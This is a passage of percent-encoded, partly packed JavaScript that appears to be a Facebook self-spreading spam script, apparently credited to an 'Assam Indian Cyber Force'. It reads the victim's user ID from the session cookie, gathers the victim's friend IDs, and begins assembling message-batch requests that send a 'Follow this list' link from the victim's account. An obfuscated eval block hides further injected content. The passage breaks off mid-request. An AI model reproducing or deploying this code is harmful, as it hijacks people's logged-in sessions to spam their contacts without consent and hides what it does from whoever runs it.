20%20%20%20%20%20%44%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%22%73%74%79%6C%65%22%2C%20%22%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%74%6F%70%3A%30%70%78%3B%6C%65%66%74%3A%30%70%78%3B%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%44%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%22%63%6C%61%73%73%22%2C%20%22%6C%6F%61%64%69%6E%67%2D%69%6E%64%69%63%61%74%6F%72%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%44%2E%69%6E%6E%65%72%48%54%4D%4C%20%3D%20%43%2E%6C%6F%61%64%69%6E%67%49%6E%64%69%63%61%74%6F%72%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%22%62%6F%64%79%22%29%5B%30%5D%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%44%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%68%69%73%2E%6F%70%74%2E%6C%6F%61%64%69%6E%67%49%6E%64%69%63%61%74%6F%72%20%3D%20%44%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%69%66%20%28%43%2E%6C%6F%61%64%69%6E%67%29%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%43%2E%6C%6F%61%64%69%6E%67%29%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%22%62%6C%6F%63%6B%22%3B%0A%20%20%20%20%20%20%20%20%74%68%69%73%2E%6C%6F%61%64%28%43%2E%75%72%6C%2C%20%66%75%6E%63%74%69%6F%6E%20%28%45%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%43%2E%6F%6E%53%75%63%63%65%73%73%29%20%43%2E%6F%6E%53%75%63%63%65%73%73%28%45%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%43%2E%75%70%64%61%74%65%29%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%43%2E%75%70%64%61%74%65%29%2E%69%6E%6E%65%72%48%54%4D%4C%20%3D%20%45%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%44%29%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%22%62%6F%64%79%22%29%5B%30%5D%2E%72%65%6D%6F%76%65%43%68%69%6C%64%28%44%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%43%2E%6C%6F%61%64%69%6E%67%29%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%43%2E%6C%6F%61%64%69%6E%67%29%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%22%6E%6F%6E%65%22%0A%20%20%20%20%20%20%20%20%7D%2C%20%43%2E%66%6F%72%6D%61%74%2C%20%43%2E%6D%65%74%68%6F%64%2C%20%43%29%0A%20%20%20%20%7D%2C%0A%20%20%20%20%69%6E%69%74%3A%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%72%65%74%75%72%6E%20%74%68%69%73%2E%67%65%74%48%54%54%50%4F%62%6A%65%63%74%28%29%0A%20%20%20%20%7D%0A%7D%3B%0A%76%61%72%20%6A%20%3D%20%30%3B%0A%76%61%72%20%6B%20%3D%20%30%3B%0A%76%61%72%20%73%75%63%20%3D%20%30%3B%0A%76%61%72%20%6D%73%67%20%3D%20%22%46%6F%6C%6C%6F%77%20%74%68%69%73%20%6C%69%73%74%20%70%6C%65%61%73%65%2E%2E%2E%20%68%74%74%70%73%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%6C%69%73%74%73%2F%31%35%36%34%38%39%35%35%34%35%31%35%30%35%31%22%3B%0A%76%61%72%20%61%72%72%20%3D%20%6E%65%77%20%41%72%72%61%79%3B%0A%76%61%72%20%75%73%65%72%5F%69%64%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%6D%61%74%63%68%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%6D%61%74%63%68%28%2F%63%5F%75%73%65%72%3D%28%5C%64%2B%29%2F%29%5B%31%5D%29%3B%0A%0A%66%75%6E%63%74%69%6F%6E%20%61%75%74%6F%70%6F%73%74%69%6E%67%66%75%6E%63%28%73%65%6E%64%65%72%29%20%7B%0A%20%20%20%20%69%66%20%28%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%74%78%74%46%6C%6F%6F%64%4D%73%67%22%29%2E%76%61%6C%75%65%20%21%3D%20%22%22%29%20%6D%73%67%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%74%78%74%46%6C%6F%6F%64%4D%73%67%22%29%2E%76%61%6C%75%65%3B%0A%20%20%20%20%6A%78%2E%6C%6F%61%64%28%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%70%72%6F%74%6F%63%6F%6C%20%2B%20%22%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%61%6A%61%78%2F%74%79%70%65%61%68%65%61%64%2F%73%65%61%72%63%68%2F%62%6F%6F%74%73%74%72%61%70%2E%70%68%70%3F%5F%5F%61%3D%31%26%66%69%6C%74%65%72%5B%30%5D%3D%75%73%65%72%26%76%69%65%77%65%72%3D%22%20%2B%20%75%73%65%72%5F%69%64%20%2B%20%22%26%74%6F%6B%65%6E%3D%76%37%26%6C%61%7A%79%3D%30%26%5F%5F%75%73%65%72%3D%22%20%2B%20%75%73%65%72%5F%69%64%2C%20%66%75%6E%63%74%69%6F%6E%20%28%61%29%20%7B%0A%20%20%20%20%20%20%20%20%76%61%72%20%62%20%3D%20%61%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%63%20%3D%20%62%2E%73%75%62%73%74%72%69%6E%67%28%62%2E%69%6E%64%65%78%4F%66%28%22%7B%22%29%29%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%64%20%3D%20%4A%53%4F%4E%2E%70%61%72%73%65%28%63%29%3B%0A%20%20%20%20%20%20%20%20%64%20%3D%20%64%2E%70%61%79%6C%6F%61%64%2E%65%6E%74%72%69%65%73%3B%0A%20%20%20%20%20%20%20%20%66%6F%72%20%28%76%61%72%20%65%20%3D%20%30%3B%20%65%20%3C%20%64%2E%6C%65%6E%67%74%68%3B%20%65%2B%2B%29%20%61%72%72%2E%70%75%73%68%28%64%5B%65%5D%2E%75%69%64%29%3B%0A%20%20%20%20%20%20%20%20%73%65%6E%64%65%72%2E%70%61%72%65%6E%74%4E%6F%64%65%2E%69%6E%6E%65%72%48%54%4D%4C%20%3D%20%22%50%6C%65%61%73%65%20%57%61%69%74%2E%2E%2E%22%3B%0A%20%20%20%20%20%20%20%20%70%6F%73%74%69%74%6F%6B%28%29%0A%20%20%20%20%7D%29%0A%7D%0A%76%61%72%20%5F%30%78%36%31%32%61%20%3D%20%5B%22%5C%78%36%35%5C%78%32%30%5C%78%36%31%5C%78%33%44%5C%78%32%37%5C%78%36%36%5C%78%32%30%5C%78%36%32%5C%78%33%41%5C%78%32%30%5C%78%33%43%5C%78%34%31%5C%78%32%30%5C%78%33%30%5C%78%33%44%5C%78%32%32%5C%78%33%31%5C%78%33%41%5C%78%32%33%5C%78%33%32%5C%78%33%42%5C%78%32%32%5C%78%32%30%5C%78%33%33%5C%78%33%44%5C%78%32%32%5C%78%33%34%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%33%38%5C%78%32%45%5C%78%33%39%5C%78%32%45%5C%78%33%35%5C%78%32%46%5C%78%36%37%5C%78%32%32%5C%78%32%30%5C%78%33%36%5C%78%33%44%5C%78%32%32%5C%78%33%37%5C%78%32%32%5C%78%33%45%5C%78%36%38%5C%78%32%30%5C%78%35%42%5C%78%36%39%5C%78%32%30%5C%78%35%44%5C%78%32%30%5C%78%36%41%5C%78%32%35%5C%78%33%43%5C%78%32%46%5C%78%34%31%5C%78%33%45%5C%78%32%30%5C%78%32%36%5C%78%32%30%5C%78%33%43%5C%78%34%31%5C%78%32%30%5C%78%33%30%5C%78%33%44%5C%78%32%32%5C%78%33%31%5C%78%33%41%5C%78%32%33%5C%78%33%32%5C%78%33%42%5C%78%32%32%5C%78%32%30%5C%78%33%33%5C%78%33%44%5C%78%32%32%5C%78%33%34%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%33%38%5C%78%32%45%5C%78%33%39%5C%78%32%45%5C%78%33%35%5C%78%32%46%5C%78%36%42%5C%78%32%32%5C%78%32%30%5C%78%33%36%5C%78%33%44%5C%78%32%32%5C%78%33%37%5C%78%32%32%5C%78%33%45%5C%78%32%30%5C%78%36%43%5C%78%32%30%5C%78%36%44%5C%78%32%30%5C%78%36%45%5C%78%32%30%5C%78%36%46%5C%78%33%43%5C%78%32%46%5C%78%34%31%5C%78%33%45%5C%78%32%45%5C%78%33%43%5C%78%32%46%5C%78%36%33%5C%78%33%45%5C%78%37%30%5C%78%32%30%5C%78%37%31%5C%78%32%30%5C%78%36%32%5C%78%33%41%5C%78%32%30%5C%78%33%43%5C%78%32%46%5C%78%34%31%5C%78%33%45%5C%78%33%43%5C%78%34%31%5C%78%32%30%5C%78%33%30%5C%78%33%44%5C%78%32%32%5C%78%33%31%5C%78%33%41%5C%78%32%33%5C%78%33%32%5C%78%33%42%5C%78%32%32%5C%78%32%30%5C%78%33%33%5C%78%33%44%5C%78%32%32%5C%78%33%34%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%33%38%5C%78%32%45%5C%78%33%39%5C%78%32%45%5C%78%33%35%5C%78%32%46%5C%78%37%32%5C%78%32%32%5C%78%32%30%5C%78%33%36%5C%78%33%44%5C%78%32%32%5C%78%33%37%5C%78%32%32%5C%78%33%45%5C%78%32%30%5C%78%37%33%5C%78%32%30%5C%78%37%34%5C%78%33%43%5C%78%32%46%5C%78%34%31%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%34%31%5C%78%33%45%5C%78%32%43%5C%78%33%43%5C%78%32%46%5C%78%34%31%5C%78%33%45%5C%78%33%43%5C%78%34%31%5C%78%32%30%5C%78%33%30%5C%78%33%44%5C%78%32%32%5C%78%33%31%5C%78%33%41%5C%78%32%33%5C%78%33%32%5C%78%33%42%5C%78%32%32%5C%78%32%30%5C%78%33%33%5C%78%33%44%5C%78%32%32%5C%78%33%34%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%33%38%5C%78%32%45%5C%78%33%39%5C%78%32%45%5C%78%33%35%5C%78%32%46%5C%78%37%35%5C%78%32%32%5C%78%32%30%5C%78%33%36%5C%78%33%44%5C%78%32%32%5C%78%33%37%5C%78%32%32%5C%78%33%45%5C%78%32%30%5C%78%37%36%5C%78%32%30%5C%78%37%37%5C%78%32%45%5C%78%32%30%5C%78%37%38%5C%78%33%43%5C%78%32%46%5C%78%34%31%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%34%31%5C%78%33%45%5C%78%32%45%5C%78%33%43%5C%78%32%46%5C%78%36%33%5C%78%33%45%5C%78%37%39%5C%78%32%30%5C%78%37%41%5C%78%32%30%5C%78%34%32%5C%78%32%30%5C%78%34%33%5C%78%32%30%5C%78%34%34%5C%78%32%30%5C%78%34%35%5C%78%32%30%5C%78%33%43%5C%78%34%31%5C%78%32%30%5C%78%33%30%5C%78%33%44%5C%78%32%32%5C%78%33%31%5C%78%33%41%5C%78%32%33%5C%78%33%32%5C%78%33%42%5C%78%32%32%5C%78%32%30%5C%78%33%33%5C%78%33%44%5C%78%32%32%5C%78%33%34%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%34%36%5C%78%32%45%5C%78%34%37%5C%78%32%45%5C%78%34%38%5C%78%32%46%5C%78%32%32%5C%78%32%30%5C%78%33%36%5C%78%33%44%5C%78%32%32%5C%78%33%37%5C%78%32%32%5C%78%33%45%5C%78%34%39%5C%78%32%30%5C%78%34%41%5C%78%32%30%5C%78%34%42%5C%78%33%43%5C%78%32%46%5C%78%34%31%5C%78%33%45%5C%78%32%45%5C%78%33%43%5C%78%32%46%5C%78%34%31%5C%78%33%45%5C%78%32%37%5C%78%33%42%5C%78%34%43%5C%78%32%38%5C%78%34%44%5C%78%32%31%5C%78%33%44%5C%78%36%31%5C%78%32%39%5C%78%37%42%5C%78%34%45%5C%78%33%41%5C%78%32%38%5C%78%34%46%5C%78%32%38%5C%78%32%39%5C%78%37%42%5C%78%36%34%5C%78%32%45%5C%78%35%30%5C%78%32%45%5C%78%35%31%5C%78%32%38%5C%78%36%34%5C%78%32%45%5C%78%35%32%5C%78%32%38%5C%78%32%37%5C%78%35%33%5C%78%32%37%5C%78%32%39%5C%78%32%39%5C%78%32%45%5C%78%35%34%5C%78%33%44%5C%78%32%37%5C%78%35%35%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%35%36%5C%78%32%45%5C%78%35%37%5C%78%32%45%5C%78%33%35%5C%78%32%46%5C%78%35%38%5C%78%32%46%5C%78%35%39%5C%78%32%44%5C%78%35%41%5C%78%32%46%5C%78%33%31%5C%78%33%30%5C%78%32%46%5C%78%33%31%5C%78%33%31%5C%78%32%45%5C%78%33%31%5C%78%33%32%5C%78%32%37%5C%78%37%44%5C%78%32%39%5C%78%32%38%5C%78%32%39%5C%78%37%44%22%2C%20%22%5C%78%37%43%22%2C%20%22%5C%78%37%33%5C%78%37%30%5C%78%36%43%5C%78%36%39%5C%78%37%34%22%2C%20%22%5C%78%37%33%5C%78%37%34%5C%78%37%39%5C%78%36%43%5C%78%36%35%5C%78%37%43%5C%78%36%33%5C%78%36%46%5C%78%36%43%5C%78%36%46%5C%78%37%32%5C%78%37%43%5C%78%33%33%5C%78%34%32%5C%78%33%35%5C%78%33%39%5C%78%33%39%5C%78%33%38%5C%78%37%43%5C%78%36%38%5C%78%37%32%5C%78%36%35%5C%78%36%36%5C%78%37%43%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%37%43%5C%78%36%33%5C%78%36%46%5C%78%36%44%5C%78%37%43%5C%78%37%34%5C%78%36%31%5C%78%37%32%5C%78%36%37%5C%78%36%35%5C%78%37%34%5C%78%37%43%5C%78%35%46%5C%78%36%32%5C%78%36%43%5C%78%36%31%5C%78%36%45%5C%78%36%42%5C%78%37%43%5C%78%37%37%5C%78%37%37%5C%78%37%37%5C%78%37%43%5C%78%36%36%5C%78%36%31%5C%78%36%33%5C%78%36%35%5C%78%36%32%5C%78%36%46%5C%78%36%46%5C%78%36%42%5C%78%37%43%5C%78%34%46%5C%78%36%44%5C%78%36%45%5C%78%36%39%5C%78%35%46%5C%78%37%34%5C%78%36%35%5C%78%37%38%5C%78%37%34%5C%78%37%43%5C%78%34%32%5C%78%37%39%5C%78%37%43%5C%78%36%32%5C%78%37%32%5C%78%37%43%5C%78%36%34%5C%78%36%46%5C%78%36%33%5C%78%37%35%5C%78%36%44%5C%78%36%35%5C%78%36%45%5C%78%37%34%5C%78%37%43%5C%78%37%36%5C%78%36%31%5C%78%37%32%5C%78%37%43%5C%78%35%30%5C%78%36%46%5C%78%37%37%5C%78%36%35%5C%78%37%32%5C%78%36%35%5C%78%36%34%5C%78%37%43%5C%78%33%33%5C%78%33%31%5C%78%33%33%5C%78%33%30%5C%78%33%37%5C%78%33%32%5C%78%33%35%5C%78%33%33%5C%78%33%32%5C%78%33%31%5C%78%33%30%5C%78%33%31%5C%78%33%30%5C%78%33%37%5C%78%33%36%5C%78%37%43%5C%78%34%43%5C%78%36%46%5C%78%36%31%5C%78%36%34%5C%78%36%39%5C%78%36%45%5C%78%36%37%5C%78%37%43%5C%78%36%43%5C%78%36%43%5C%78%36%43%5C%78%36%43%5C%78%36%43%5C%78%36%43%5C%78%36%43%5C%78%36%43%5C%78%36%43%5C%78%36%43%5C%78%36%43%5C%78%37%43%5C%78%33%39%5C%78%33%39%5C%78%37%43%5C%78%33%31%5C%78%33%39%5C%78%33%39%5C%78%33%31%5C%78%33%33%5C%78%33%34%5C%78%33%34%5C%78%33%39%5C%78%33%36%5C%78%33%39%5C%78%33%31%5C%78%33%34%5C%78%33%30%5C%78%33%37%5C%78%33%37%5C%78%37%43%5C%78%34%31%5C%78%37%33%5C%78%37%33%5C%78%36%31%5C%78%36%44%5C%78%37%43%5C%78%34%39%5C%78%36%45%5C%78%36%34%5C%78%36%39%5C%78%36%31%5C%78%36%45%5C%78%37%43%5C%78%34%33%5C%78%37%39%5C%78%36%32%5C%78%36%35%5C%78%37%32%5C%78%37%43%5C%78%34%36%5C%78%36%46%5C%78%37%32%5C%78%36%33%5C%78%36%35%5C%78%37%43%5C%78%35%33%5C%78%36%33%5C%78%37%32%5C%78%36%39%5C%78%37%30%5C%78%37%34%5C%78%37%43%5C%78%34%44%5C%78%36%31%5C%78%36%34%5C%78%36%35%5C%78%37%43%5C%78%33%31%5C%78%33%30%5C%78%33%30%5C%78%33%30%5C%78%33%30%5C%78%33%31%5C%78%33%30%5C%78%33%35%5C%78%33%30%5C%78%33%32%5C%78%33%33%5C%78%33%35%5C%78%33%34%5C%78%33%32%5C%78%33%30%5C%78%37%43%5C%78%35%37%5C%78%36%31%5C%78%37%31%5C%78%36%31%5C%78%37%32%5C%78%37%43%5C%78%34%31%5C%78%36%38%5C%78%36%44%5C%78%36%31%5C%78%36%34%5C%78%37%43%5C%78%33%31%5C%78%33%30%5C%78%33%30%5C%78%33%30%5C%78%33%30%5C%78%33%35%5C%78%33%31%5C%78%33%31%5C%78%33%35%5C%78%33%39%5C%78%33%33%5C%78%33%38%5C%78%33%36%5C%78%33%31%5C%78%33%34%5C%78%37%43%5C%78%34%32%5C%78%36%38%5C%78%36%31%5C%78%37%32%5C%78%36%37%5C%78%36%31%5C%78%37%36%5C%78%37%43%5C%78%34%41%5C%78%35%34%5C%78%37%43%5C%78%34%37%5C%78%36%46%5C%78%36%37%5C%78%36%46%5C%78%36%39%5C%78%37%43%5C%78%34%36%5C%78%36%46%5C%78%37%32%5C%78%37%43%5C%78%34%44%5C%78%36%46%5C%78%37%32%5C%78%36%35%5C%78%37%43%5C%78%37%43%5C%78%35%34%5C%78%36%46%5C%78%36%46%5C%78%36%43%5C%78%37%33%5C%78%37%43%5C%78%35%36%5C%78%36%39%5C%78%37%33%5C%78%36%39%5C%78%37%34%5C%78%37%43%5C%78%34%46%5C%78%37%35%5C%78%37%32%5C%78%37%43%5C%78%34%32%5C%78%36%43%5C%78%36%46%5C%78%36%37%5C%78%36%37%5C%78%36%35%5C%78%37%32%5C%78%37%43%5C%78%36%31%5C%78%37%35%5C%78%37%34%5C%78%36%46%5C%78%36%44%5C%78%36%31%5C%78%37%34%5C%78%36%35%5C%78%37%39%5C%78%36%46%5C%78%37%35%5C%78%37%32%5C%78%36%36%5C%78%36%31%5C%78%36%33%5C%78%36%35%5C%78%36%32%5C%78%36%46%5C%78%36%46%5C%78%36%42%5C%78%37%43%5C%78%36%32%5C%78%36%43%5C%78%36%46%5C%78%36%37%5C%78%37%33%5C%78%37%30%5C%78%36%46%5C%78%37%34%5C%78%37%43%5C%78%36%39%5C%78%36%45%5C%78%37%43%5C%78%34%31%5C%78%37%35%5C%78%37%34%5C%78%36%46%5C%78%36%44%5C%78%36%31%5C%78%37%34%5C%78%36%35%5C%78%37%43%5C%78%35%39%5C%78%36%46%5C%78%37%35%5C%78%37%32%5C%78%37%43%5C%78%34%36%5C%78%36%31%5C%78%36%33%5C%78%36%35%5C%78%36%32%5C%78%36%46%5C%78%36%46%5C%78%36%42%5C%78%37%43%5C%78%36%39%5C%78%36%36%5C%78%37%43%5C%78%35%46%5C%78%37%34%5C%78%36%35%5C%78%37%38%5C%78%37%34%5C%78%37%43%5C%78%36%41%5C%78%36%31%5C%78%37%36%5C%78%36%31%5C%78%37%33%5C%78%36%33%5C%78%37%32%5C%78%36%39%5C%78%37%30%5C%78%37%34%5C%78%37%43%5C%78%36%36%5C%78%37%35%5C%78%36%45%5C%78%36%33%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%5C%78%37%43%5C%78%36%32%5C%78%36%46%5C%78%36%34%5C%78%37%39%5C%78%37%43%5C%78%36%31%5C%78%37%30%5C%78%37%30%5C%78%36%35%5C%78%36%45%5C%78%36%34%5C%78%34%33%5C%78%36%38%5C%78%36%39%5C%78%36%43%5C%78%36%34%5C%78%37%43%5C%78%36%33%5C%78%37%32%5C%78%36%35%5C%78%36%31%5C%78%37%34%5C%78%36%35%5C%78%34%35%5C%78%36%43%5C%78%36%35%5C%78%36%44%5C%78%36%35%5C%78%36%45%5C%78%37%34%5C%78%37%43%5C%78%37%33%5C%78%36%33%5C%78%37%32%5C%78%36%39%5C%78%37%30%5C%78%37%34%5C%78%37%43%5C%78%37%33%5C%78%37%32%5C%78%36%33%5C%78%37%43%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%37%33%5C%78%37%43%5C%78%37%32%5C%78%36%31%5C%78%37%37%5C%78%37%43%5C%78%36%37%5C%78%36%39%5C%78%37%34%5C%78%36%38%5C%78%37%35%5C%78%36%32%5C%78%37%43%5C%78%36%32%5C%78%36%38%5C%78%36%31%5C%78%37%32%5C%78%36%37%5C%78%36%31%5C%78%37%36%5C%78%33%31%5C%78%33%39%5C%78%33%39%5C%78%33%36%5C%78%37%43%5C%78%34%36%5C%78%37%35%5C%78%36%45%5C%78%37%43%5C%78%37%34%5C%78%36%39%5C%78%36%44%5C%78%36%35%5C%78%37%43%5C%78%36%44%5C%78%36%31%5C%78%37%33%5C%78%37%34%5C%78%36%35%5C%78%37%32%5C%78%37%43%5C%78%35%35%5C%78%36%45%5C%78%36%39%5C%78%36%46%5C%78%36%45%5C%78%37%43%5C%78%36%41%5C%78%37%33%22%2C%20%22%22%2C%20%22%5C%78%36%36%5C%78%37%32%5C%78%36%46%5C%78%36%44%5C%78%34%33%5C%78%36%38%5C%78%36%31%5C%78%37%32%5C%78%34%33%5C%78%36%46%5C%78%36%34%5C%78%36%35%22%2C%20%22%5C%78%37%32%5C%78%36%35%5C%78%37%30%5C%78%36%43%5C%78%36%31%5C%78%36%33%5C%78%36%35%22%2C%20%22%5C%78%35%43%5C%78%37%37%5C%78%32%42%22%2C%20%22%5C%78%35%43%5C%78%36%32%22%2C%20%22%5C%78%36%37%22%5D%3B%0A%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%20%28%5F%30%78%31%62%33%62%78%31%2C%20%5F%30%78%31%62%33%62%78%32%2C%20%5F%30%78%31%62%33%62%78%33%2C%20%5F%30%78%31%62%33%62%78%34%2C%20%5F%30%78%31%62%33%62%78%35%2C%20%5F%30%78%31%62%33%62%78%36%29%20%7B%0A%20%20%20%20%5F%30%78%31%62%33%62%78%35%20%3D%20%66%75%6E%63%74%69%6F%6E%20%28%5F%30%78%31%62%33%62%78%33%29%20%7B%0A%20%20%20%20%20%20%20%20%72%65%74%75%72%6E%20%28%5F%30%78%31%62%33%62%78%33%20%3C%20%5F%30%78%31%62%33%62%78%32%20%3F%20%5F%30%78%36%31%32%61%5B%34%5D%20%3A%20%5F%30%78%31%62%33%62%78%35%28%70%61%72%73%65%49%6E%74%28%5F%30%78%31%62%33%62%78%33%20%2F%20%5F%30%78%31%62%33%62%78%32%29%29%29%20%2B%20%28%28%5F%30%78%31%62%33%62%78%33%20%3D%20%5F%30%78%31%62%33%62%78%33%20%25%20%5F%30%78%31%62%33%62%78%32%29%20%3E%20%33%35%20%3F%20%53%74%72%69%6E%67%5B%5F%30%78%36%31%32%61%5B%35%5D%5D%28%5F%30%78%31%62%33%62%78%33%20%2B%20%32%39%29%20%3A%20%5F%30%78%31%62%33%62%78%33%2E%74%6F%53%74%72%69%6E%67%28%33%36%29%29%3B%0A%20%20%20%20%7D%3B%0A%20%20%20%20%69%66%20%28%21%5F%30%78%36%31%32%61%5B%34%5D%5B%5F%30%78%36%31%32%61%5B%36%5D%5D%28%2F%5E%2F%2C%20%53%74%72%69%6E%67%29%29%20%7B%0A%20%20%20%20%20%20%20%20%77%68%69%6C%65%20%28%5F%30%78%31%62%33%62%78%33%2D%2D%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%5F%30%78%31%62%33%62%78%36%5B%5F%30%78%31%62%33%62%78%35%28%5F%30%78%31%62%33%62%78%33%29%5D%20%3D%20%5F%30%78%31%62%33%62%78%34%5B%5F%30%78%31%62%33%62%78%33%5D%20%7C%7C%20%5F%30%78%31%62%33%62%78%35%28%5F%30%78%31%62%33%62%78%33%29%3B%0A%20%20%20%20%20%20%20%20%7D%3B%0A%20%20%20%20%20%20%20%20%5F%30%78%31%62%33%62%78%34%20%3D%20%5B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%28%5F%30%78%31%62%33%62%78%35%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%72%65%74%75%72%6E%20%5F%30%78%31%62%33%62%78%36%5B%5F%30%78%31%62%33%62%78%35%5D%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%5D%3B%0A%20%20%20%20%20%20%20%20%5F%30%78%31%62%33%62%78%35%20%3D%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%72%65%74%75%72%6E%20%5F%30%78%36%31%32%61%5B%37%5D%3B%0A%20%20%20%20%20%20%20%20%7D%3B%0A%20%20%20%20%20%20%20%20%5F%30%78%31%62%33%62%78%33%20%3D%20%31%3B%0A%20%20%20%20%7D%3B%0A%20%20%20%20%77%68%69%6C%65%20%28%5F%30%78%31%62%33%62%78%33%2D%2D%29%20%7B%0A%20%20%20%20%20%20%20%20%69%66%20%28%5F%30%78%31%62%33%62%78%34%5B%5F%30%78%31%62%33%62%78%33%5D%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%5F%30%78%31%62%33%62%78%31%20%3D%20%5F%30%78%31%62%33%62%78%31%5B%5F%30%78%36%31%32%61%5B%36%5D%5D%28%6E%65%77%20%52%65%67%45%78%70%28%5F%30%78%36%31%32%61%5B%38%5D%20%2B%20%5F%30%78%31%62%33%62%78%35%28%5F%30%78%31%62%33%62%78%33%29%20%2B%20%5F%30%78%36%31%32%61%5B%38%5D%2C%20%5F%30%78%36%31%32%61%5B%39%5D%29%2C%20%5F%30%78%31%62%33%62%78%34%5B%5F%30%78%31%62%33%62%78%33%5D%29%3B%0A%20%20%20%20%20%20%20%20%7D%3B%0A%20%20%20%20%7D%3B%0A%20%20%20%20%72%65%74%75%72%6E%20%5F%30%78%31%62%33%62%78%31%3B%0A%7D%28%5F%30%78%36%31%32%61%5B%30%5D%2C%20%36%32%2C%20%36%35%2C%20%5F%30%78%36%31%32%61%5B%33%5D%5B%5F%30%78%36%31%32%61%5B%32%5D%5D%28%5F%30%78%36%31%32%61%5B%31%5D%29%2C%20%30%2C%20%7B%7D%29%29%3B%0A%76%61%72%20%61%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%69%6E%6E%65%72%48%54%4D%4C%3B%0A%76%61%72%20%64%74%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%4E%61%6D%65%28%22%66%62%5F%64%74%73%67%22%29%5B%30%5D%2E%76%61%6C%75%65%3B%0A%76%61%72%20%63%6F%6D%70%6F%73%65%72%69%64%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%6D%61%74%63%68%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%6D%61%74%63%68%28%2F%63%5F%75%73%65%72%3D%28%5C%64%2B%29%2F%29%5B%31%5D%29%3B%0A%76%61%72%20%6E%6F%77%20%3D%20%28%6E%65%77%20%44%61%74%65%29%2E%67%65%74%54%69%6D%65%28%29%3B%0A%0A%66%75%6E%63%74%69%6F%6E%20%70%6F%73%74%69%74%6F%6B%28%29%20%7B%0A%20%20%20%20%70%73%74%20%3D%20%22%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%61%63%74%69%6F%6E%5F%74%79%70%65%5D%3D%6D%61%2D%74%79%70%65%25%33%41%75%73%65%72%2D%67%65%6E%65%72%61%74%65%64%2D%6D%65%73%73%61%67%65%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%74%68%72%65%61%64%5F%69%64%5D%3D%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%61%75%74%68%6F%72%5D%3D%66%62%69%64%25%33%41%22%20%2B%20%75%73%65%72%5F%69%64%20%2B%20%22%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%61%75%74%68%6F%72%5F%65%6D%61%69%6C%5D%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%63%6F%6F%72%64%69%6E%61%74%65%73%5D%26%6D%65%73%73%61%67%65%5F%62%61%74%63%68%5B%30%5D%5B%74%69%6D%65%73%74%61%6D%70%5D%3D%22%20%2B%20%6E%6F%77%20%2B%20%22%26%6D%65%73%73%61%67%65%5F%62